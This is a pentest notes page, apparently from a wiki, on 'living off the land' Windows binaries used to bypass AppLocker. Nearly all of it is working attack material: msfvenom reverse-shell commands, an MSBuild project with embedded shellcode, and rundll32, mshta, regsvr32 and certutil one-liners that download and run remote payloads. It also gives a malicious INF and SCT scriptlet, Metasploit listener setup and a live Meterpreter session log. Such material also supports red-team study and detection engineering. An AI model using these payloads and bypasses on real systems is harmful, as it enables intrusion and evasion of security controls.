LOLBas

Living Off The Land Binaries And Scripts

LOLBas - Windows utilities

Project link:https://lolbas-project.github.io/#

LOLBas

rundll32

Rundll32 is a Microsoft binary that can execute code that is inside a DLL file. Since this utility is part of the Windows operating system it can be used as a method in order to bypass AppLocker rules or Software Restriction Policies. So if the environment is not properly lockdown and users are permitted to use this binary then they can write their own DLL’s and bypass any restrictions or execute malicious JavaScript code.

Rundll32 - CMD

In Windows systems that have locked the command prompt via an AppLocker rule it is possible to bypass this restriction by injecting a malicious DLL file into a legitimate process. Didier Stevens has released a modified version of cmd in the form of a DLL file by using an open source variant obtained from the ReactOS.

Download the new cmd: http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip

Since the rundll32 is a trusted Microsoft utility it can be used to load the cmd.dll into a process, execute the code on the DLL and therefore bypass the AppLocker rule and open the command prompt.

The following two commands can be executed from the Windows Run:

rundll32 C:\cmd.dll,EntryPoint

rundll32 shell32.dll,Control_RunDLL C:\cmd.dll

Rundll32 – JavaScript

It possible to utilize the rundll32 binary in order to execute JavaScript code that has an embedded payload and it hosted on a webserver. The Metasploit module web delivery can quickly create a webserver that will serve a specific payload (Python, PHP or PowerShell). In this case the payload will be PowerShell.

Use: exploit/multi/script/web_delivery

Set LHOST as your IP, LPORT port, payload windows/meterperter/reverese_tcp

And run exploit, on the victim:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" Rundll32 - JavaScript

Rundll32 – Meterpreter

The Metasploit Msfvenom can be used in order to create a custom DLL that will contain a meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f dll -o pentestlab.dll

The utility rundll32 can then load and execute the payload that is inside the pentestlab.dll.

rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll

*Also can be used with certutil to encode the dll:

certutil -encode TikiThings.dll TikiThings.enc

On target:

C:\> certutil -urlcache -split -f https://pastebin.com/raw/SAeR96bC TikiThings.enc

C:\> certutil -decode TikiThings.enc TikiThings.dll

Source: https://pentestlab.blog/tag/rundll32/

MSBuild

Originally MSBuild was introduced in order to enable developers to build products in environments where Visual Studio is not installed. Specifically this binary can compile XML C# project files since it has a method called Tasks that can execute a task which is written in a managed code.

It is possible to use Metasploit MSFVenom in order to generate C# shellcode which it will be executed on the target system in order to obtain a Meterpreter session.

Use unlock applocker to generate payload automatic

Manually:

Generate payload:

msfvenom --platform windows -p windows/meterpreter/reverse_tcp lhost=10.10.10.1 lport=445 -f csharp -o meterpreter_445.cs -v shellcode

Append it to the following XML code:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {         
          private static UInt32 MEM_COMMIT = 0x1000;          
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(            
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId           
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(           
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );          
          public override bool Execute()
          {
            byte[] shellcode = new byte[195] {
              0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
              0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
              0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
              0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
              0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
              0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
              0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
              0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
              0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
              0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
              0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
              0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
              0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };
              
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          } 
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

upload to the victim:

iwr -uri http://10.10.14.4/meterpreter.csproj -outfile a.csproj

Remote File Deployment:

wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml

Make sure you run a meterpreter listerner:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp 
msf5 exploit(multi/handler) > set lhost 192.168.17.130 
lhost => 192.168.17.130 
msf5 exploit(multi/handler) > set lport 443 
lport => 443 
msf5 exploit(multi/handler) > run

Run:

c:\Windows\Microsoft.NET\Framework\v4.0.30319>MSBuild.exe C:\Users\David\Desktop\exploit.csproj 
Microsoft (R) Build Engine version 4.7.3190.0 
[Microsoft .NET Framework, version 4.0.30319.42000] 
Copyright (C) Microsoft Corporation. All rights reserved. 
Build started 05/11/2019 14:08:15.

Hola!

[*] Started reverse TCP handler on 192.168.17.130:443  
[*] Sending stage (180291 bytes) to 192.168.17.1 
[*] Meterpreter session 1 opened (192.168.17.130:443 -> 192.168.17.1:24989) at 2019-11-05 14:08:16 +0000 
meterpreter > sysinfo 
Computer        : DESKTOP-41JRS1D 
OS              : Windows 10 (10.0 Build 17763). 
Architecture    : x64 
System Language : en_GB 
Domain          : WORKGROUP 
Logged On Users : 2 
Meterpreter     : x86/windows

FULL MSBuild shell

https://github.com/Cn33liz/MSBuildShell

File Path:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe 
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe 
C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe

Call MSBuild without msbuild

MSBuildAPICaller

Installutil

Execute the target .NET DLL or EXE using the uninstall method:

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

File path

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

Metasploit

There is a specific Metasploit module which can be used to bypass AppLocker via the InstallUtil method.

exploit/windows/local/applocker_bypass

This module will generate a .NET executable on the target system and it will utilize the InstallUtil binary to execute the payload bypassing the AppLocker protection.

cmstp

CMSTP is a binary which is associated with the Microsoft Connection Manager Profile Installer. It accepts INF files which can be weaponised with malicious commands in order to execute arbitrary code in the form of scriptlets (SCT) and DLL. It is a trusted Microsoft binary which is located in the following two Windows directories.

File path

C:\Windows\System32\cmstp.exe

C:\Windows\SysWOW64\cmstp.exe

Crete malicious dll:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > /root/tools/mitre/cmstp/evil.dll

Creating a file (f.inf) that will be loaded by CSMTP.exe binary that will in turn load our evil.dll:

[version] 
Signature=$chicago$ 
AdvancedINF=2.5 
[DefaultInstall_SingleUser] 
RegisterOCXs=RegisterOCXSection 
[RegisterOCXSection] 
C:\experiments\cmstp\evil.dll 
[Strings] 
AppAct = "SOFTWARE\Microsoft\Connection Manager" 
ServiceName="mantvydas" 
ShortSvcName="mantvydas"

Invoking the payload:

PS C:\experiments\cmstp> cmstp.exe /s .\f.inf

Credit: https://ired.team/offensive-security/code-execution/t1191-cmstp-code-execution

Regasm

Loads the target .DLL file and executes the UnRegisterClass function.

regasm.exe /U AllTheThingsx64.dll

Loads the target .DLL file and executes the RegisterClass function.

regasm.exe AllTheThingsx64.dll

File path:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe

Mshta

Executes code inside evilfile.hta.

mshta.exe C:\poc\evilfile.hta

Executes remote SCT file

mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close();

Executes hta file from external webserver

mshta.exe http://webserver/payload.hta

Example:

mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta

File path:

C:\Windows\System32\mshta.exe 
C:\Windows\SysWOW64\mshta.exe

Example for hta:

<HTML> 
<HEAD> 
Set objShell = CreateObject("Wscript.Shell") 
objShell.Run "powershell -noP -sta -w 1 -enc <BASE64 ENCODED EMPIRE STAGER>" 
</HEAD> 
<BODY> 
</BODY> 
</HTML>

Unicorn:

root@Kali:/opt/unicorn/# python /opt/unicorn/unicorn.py windows/meterpreter/reverse_tcp 172.20.10.3 4444 hta

SharpShooter

root@Kali:/opt/SharpShooter# python SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ~/Downloads/cobaltstrike_payloads/payload2.cs --sandbox 4 --smuggle --template mcafee

hh

Binary used for processing chm files in Windows

Paths:

C:\Windows\System32\hh.exe

C:\Windows\SysWOW64\hh.exe

Download

Open the target PowerShell script with HTML Help. HH.exe http://some.url/script.ps1

Execute

Executes calc.exe with HTML Help. HH.exe c:\windows\system32\calc.exe

Regsvcs

Loads the target .DLL file and executes the UnRegisterClass function.

regsvcs.exe /U regsvcs.dll

Loads the target .DLL file and executes the RegisterClass function.

regsvcs.exe regsvcs.dll

File path:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe

Regsvr32

We will run a malicious sct file:

<?XML version="1.0"?> 
<scriptlet> 
<registration 
  progid="TESTING" 
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" > 
  <script language="JScript"> 
    <![CDATA[ 
      var foo = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");  
    ]]> 
</script> 
</registration> 
</scriptlet>

We need to host the back.sct on a web server so we can invoke it like so:

regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dll

Metasploit

Metasploit Framework has a specific payload which can be used to bypass AppLocker via the Regsvr32 utility automatically.

exploit/windows/misc/regsvr32_applocker_bypass_server

PreviousBreakout Nextpowershell constrained language byass

Last updated 5 years ago

Was this helpful?